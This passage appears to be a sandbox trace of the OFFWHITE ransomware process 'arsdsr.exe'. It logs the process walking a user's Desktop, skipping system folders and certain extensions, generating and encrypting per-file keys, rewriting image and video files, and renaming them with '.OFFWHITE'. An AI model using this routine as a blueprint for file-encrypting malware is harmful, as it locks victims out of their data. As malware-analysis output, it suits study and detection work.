lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.173] GetProcessHeap () returned 0x500000 [0132.173] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547f28 [0132.173] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IWfTOYIvF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iwftoyivf.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.174] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=68905) returned 1 [0132.174] GetProcessHeap () returned 0x500000 [0132.174] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.174] GetProcessHeap () returned 0x500000 [0132.174] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.174] GetProcessHeap () returned 0x500000 [0132.174] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.174] GetProcessHeap () returned 0x500000 [0132.174] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.174] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.174] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.174] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.175] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.175] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.175] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.175] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.175] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.175] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.175] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.175] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.175] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.175] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x10d29, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.175] SetLastError (dwErrCode=0x0) [0132.175] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.186] GetLastError () returned 0x0 [0132.186] GetLastError () returned 0x0 [0132.186] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x10e29, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.186] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.186] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x10f29, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.186] WriteFile (in: hFile=0xb0, lpBuffer=0x547f28*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547f28*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.186] GetProcessHeap () returned 0x500000 [0132.186] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10d29) returned 0x5557b0 [0132.186] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.187] ReadFile (in: hFile=0xb0, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x10d29, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x10d29, lpOverlapped=0x0) returned 1 [0132.191] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.191] WriteFile (in: hFile=0xb0, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x10d29, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x10d29, lpOverlapped=0x0) returned 1 [0132.192] GetProcessHeap () returned 0x500000 [0132.192] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0132.192] CloseHandle (hObject=0xb0) returned 1 [0132.196] GetProcessHeap () returned 0x500000 [0132.197] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.197] GetProcessHeap () returned 0x500000 [0132.197] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.197] GetProcessHeap () returned 0x500000 [0132.197] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.197] GetProcessHeap () returned 0x500000 [0132.197] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.197] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IWfTOYIvF.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IWfTOYIvF.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IWfTOYIvF.gif" [0132.197] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IWfTOYIvF.gif", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IWfTOYIvF.gif.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IWfTOYIvF.gif.OFFWHITE" [0132.197] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IWfTOYIvF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iwftoyivf.gif"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IWfTOYIvF.gif.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iwftoyivf.gif.offwhite")) returned 1 [0132.199] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96bd0da0, ftCreationTime.dwHighDateTime=0x1d5e50f, ftLastAccessTime.dwLowDateTime=0x68492b50, ftLastAccessTime.dwHighDateTime=0x1d5e69c, ftLastWriteTime.dwLowDateTime=0x68492b50, ftLastWriteTime.dwHighDateTime=0x1d5e69c, nFileSizeHigh=0x0, nFileSizeLow=0xdb36, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="j9O3dD.jpg", cAlternateFileName="")) returned 1 [0132.199] lstrcmpiW (lpString1="j9O3dD.jpg", lpString2=".") returned 1 [0132.199] lstrcmpiW (lpString1="j9O3dD.jpg", lpString2="..") returned 1 [0132.199] lstrcmpiW (lpString1="j9O3dD.jpg", lpString2="...") returned 1 [0132.199] lstrcmpiW (lpString1="j9O3dD.jpg", lpString2="windows") returned -1 [0132.199] lstrcmpiW (lpString1="j9O3dD.jpg", lpString2="$recycle.bin") returned 1 [0132.199] lstrcmpiW (lpString1="j9O3dD.jpg", lpString2="rsa") returned -1 [0132.199] lstrcmpiW (lpString1="j9O3dD.jpg", lpString2="ntuser.dat") returned -1 [0132.199] lstrcmpiW (lpString1="j9O3dD.jpg", lpString2="programdata") returned -1 [0132.199] lstrcmpiW (lpString1="j9O3dD.jpg", lpString2="appdata") returned 1 [0132.199] lstrcmpiW (lpString1="j9O3dD.jpg", lpString2="program files") returned -1 [0132.199] lstrcmpiW (lpString1="j9O3dD.jpg", lpString2="program files (x86)") returned -1 [0132.199] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.199] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="j9O3dD.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j9O3dD.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j9O3dD.jpg" [0132.199] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.199] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.199] PathFindExtensionW (pszPath="j9O3dD.jpg") returned=".jpg" [0132.199] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0132.199] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0132.199] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0132.199] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0132.199] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0132.200] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0132.200] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0132.200] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0132.200] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0132.200] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0132.200] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0132.200] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0132.200] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0132.200] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0132.200] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0132.200] lstrcmpiW (lpString1="j9O3dD.jpg", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.200] GetProcessHeap () returned 0x500000 [0132.200] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547f38 [0132.200] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j9O3dD.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j9o3dd.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.201] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=56118) returned 1 [0132.201] GetProcessHeap () returned 0x500000 [0132.201] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.201] GetProcessHeap () returned 0x500000 [0132.201] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.201] GetProcessHeap () returned 0x500000 [0132.201] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.201] GetProcessHeap () returned 0x500000 [0132.201] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.201] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.201] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.201] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.201] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.201] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.201] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.201] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.201] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.201] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.202] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.202] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.202] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.202] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xdb36, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.202] SetLastError (dwErrCode=0x0) [0132.202] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.204] GetLastError () returned 0x0 [0132.204] GetLastError () returned 0x0 [0132.204] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xdc36, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.205] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.205] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xdd36, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.205] WriteFile (in: hFile=0xb0, lpBuffer=0x547f38*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547f38*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.205] GetProcessHeap () returned 0x500000 [0132.205] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xdb36) returned 0x5557b0 [0132.205] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.205] ReadFile (in: hFile=0xb0, lpBuffer=0x5557b0, nNumberOfBytesToRead=0xdb36, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0xdb36, lpOverlapped=0x0) returned 1 [0132.209] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.209] WriteFile (in: hFile=0xb0, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0xdb36, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0xdb36, lpOverlapped=0x0) returned 1 [0132.210] GetProcessHeap () returned 0x500000 [0132.210] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0132.210] CloseHandle (hObject=0xb0) returned 1 [0132.225] GetProcessHeap () returned 0x500000 [0132.225] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.225] GetProcessHeap () returned 0x500000 [0132.225] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.225] GetProcessHeap () returned 0x500000 [0132.225] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.225] GetProcessHeap () returned 0x500000 [0132.225] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.225] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j9O3dD.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j9O3dD.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j9O3dD.jpg" [0132.225] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j9O3dD.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j9O3dD.jpg.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j9O3dD.jpg.OFFWHITE" [0132.226] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j9O3dD.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j9o3dd.jpg"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j9O3dD.jpg.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j9o3dd.jpg.offwhite")) returned 1 [0132.227] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4eabc0, ftCreationTime.dwHighDateTime=0x1d5e027, ftLastAccessTime.dwLowDateTime=0xfaa0eb50, ftLastAccessTime.dwHighDateTime=0x1d5e016, ftLastWriteTime.dwLowDateTime=0xfaa0eb50, ftLastWriteTime.dwHighDateTime=0x1d5e016, nFileSizeHigh=0x0, nFileSizeLow=0xad34, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="jy2fj9OToxS.mkv", cAlternateFileName="JY2FJ9~1.MKV")) returned 1 [0132.227] lstrcmpiW (lpString1="jy2fj9OToxS.mkv", lpString2=".") returned 1 [0132.227] lstrcmpiW (lpString1="jy2fj9OToxS.mkv", lpString2="..") returned 1 [0132.227] lstrcmpiW (lpString1="jy2fj9OToxS.mkv", lpString2="...") returned 1 [0132.227] lstrcmpiW (lpString1="jy2fj9OToxS.mkv", lpString2="windows") returned -1 [0132.227] lstrcmpiW (lpString1="jy2fj9OToxS.mkv", lpString2="$recycle.bin") returned 1 [0132.227] lstrcmpiW (lpString1="jy2fj9OToxS.mkv", lpString2="rsa") returned -1 [0132.227] lstrcmpiW (lpString1="jy2fj9OToxS.mkv", lpString2="ntuser.dat") returned -1 [0132.227] lstrcmpiW (lpString1="jy2fj9OToxS.mkv", lpString2="programdata") returned -1 [0132.227] lstrcmpiW (lpString1="jy2fj9OToxS.mkv", lpString2="appdata") returned 1 [0132.228] lstrcmpiW (lpString1="jy2fj9OToxS.mkv", lpString2="program files") returned -1 [0132.228] lstrcmpiW (lpString1="jy2fj9OToxS.mkv", lpString2="program files (x86)") returned -1 [0132.228] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.228] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="jy2fj9OToxS.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jy2fj9OToxS.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jy2fj9OToxS.mkv" [0132.228] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.228] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.228] PathFindExtensionW (pszPath="jy2fj9OToxS.mkv") returned=".mkv" [0132.228] lstrcmpiW (lpString1=".mkv", lpString2=".exe") returned 1 [0132.228] lstrcmpiW (lpString1=".mkv", lpString2=".log") returned 1 [0132.228] lstrcmpiW (lpString1=".mkv", lpString2=".cab") returned 1 [0132.228] lstrcmpiW (lpString1=".mkv", lpString2=".cmd") returned 1 [0132.228] lstrcmpiW (lpString1=".mkv", lpString2=".com") returned 1 [0132.228] lstrcmpiW (lpString1=".mkv", lpString2=".cpl") returned 1 [0132.228] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0132.228] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0132.228] lstrcmpiW (lpString1=".mkv", lpString2=".url") returned -1 [0132.228] lstrcmpiW (lpString1=".mkv", lpString2=".ttf") returned -1 [0132.228] lstrcmpiW (lpString1=".mkv", lpString2=".mp3") returned -1 [0132.228] lstrcmpiW (lpString1=".mkv", lpString2=".pif") returned -1 [0132.228] lstrcmpiW (lpString1=".mkv", lpString2=".mp4") returned -1 [0132.228] lstrcmpiW (lpString1=".mkv", lpString2=".OFFWHITE") returned -1 [0132.228] lstrcmpiW (lpString1=".mkv", lpString2=".msi") returned -1 [0132.228] lstrcmpiW (lpString1="jy2fj9OToxS.mkv", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.228] GetProcessHeap () returned 0x500000 [0132.228] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547f48 [0132.228] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jy2fj9OToxS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jy2fj9otoxs.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.229] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=44340) returned 1 [0132.229] GetProcessHeap () returned 0x500000 [0132.229] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.229] GetProcessHeap () returned 0x500000 [0132.229] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.229] GetProcessHeap () returned 0x500000 [0132.229] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.229] GetProcessHeap () returned 0x500000 [0132.229] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.229] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.229] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.229] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.230] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.230] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.230] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.230] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.230] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.230] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.230] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.230] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.230] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.230] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xad34, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.230] SetLastError (dwErrCode=0x0) [0132.230] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.238] GetLastError () returned 0x0 [0132.238] GetLastError () returned 0x0 [0132.238] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xae34, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.238] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.238] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xaf34, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.238] WriteFile (in: hFile=0xb0, lpBuffer=0x547f48*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547f48*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.238] GetProcessHeap () returned 0x500000 [0132.238] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xad34) returned 0x5557b0 [0132.238] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.238] ReadFile (in: hFile=0xb0, lpBuffer=0x5557b0, nNumberOfBytesToRead=0xad34, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0xad34, lpOverlapped=0x0) returned 1 [0132.242] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.242] WriteFile (in: hFile=0xb0, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0xad34, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0xad34, lpOverlapped=0x0) returned 1 [0132.242] GetProcessHeap () returned 0x500000 [0132.242] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0132.242] CloseHandle (hObject=0xb0) returned 1 [0132.245] GetProcessHeap () returned 0x500000 [0132.245] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.245] GetProcessHeap () returned 0x500000 [0132.245] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.245] GetProcessHeap () returned 0x500000 [0132.245] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.245] GetProcessHeap () returned 0x500000 [0132.245] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.245] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS 